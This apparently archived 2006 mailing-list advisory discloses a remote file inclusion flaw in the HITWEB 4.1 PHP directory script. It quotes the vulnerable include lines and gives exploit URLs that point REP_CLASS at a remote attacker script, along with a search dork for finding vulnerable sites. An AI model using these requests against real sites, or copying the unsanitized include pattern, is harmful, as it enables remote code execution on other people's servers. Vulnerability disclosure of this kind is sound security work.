Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

GEPI <= 1.4.0 gestion/savebackup. php Remote File Include Vulnerability

[ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion

Clanlite Remote File Include

jamroom Remote File Include

From:	x_w0x <x_w0x_(at)_hotmail.com>
Date:	31.10.2006
Subject:	HITWEB Remote File Include

#################################
# HITWEB 4.1                                 #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
#site:http://www.hitweb.org/
# Site Download: http://www.lbb.org/cgi-bin/script/telecharger.cgi?ID=2919 #
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code
=================addlink.php3================

include "$REP_CLASS/template.inc"
include "$REP_CLASS/class.http_storage".$EXT_PHP ;

include "$REP_CLASS/class.hitweb".$EXT_PHP ;
include "admin/$REP_LANG_ADMIN/$LANG_ADMIN".
include "$REP_INC/lib_database.php3"

==============appreciation.php3===============

include "$REP_CLASS/template.inc"

==============genpage.php3================

include "$REP_INC/lib_database.php3"

============refererpoint.php3================

include "$REP_CLASS/template.inc" #

####################################

£xploit:

http://www.victim.com/[path]/addlink.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/genpage.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/refererpoint.php3?REP_CLASS= class="fixed">http://DarknesseScript.txt

######

#Dork : "Copyright © 1998 - 2004 Brian FRAVAL"


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0k, and elite-team
=========================
#w£lc0m£ In x0|0x
#by x_w0x
############################################################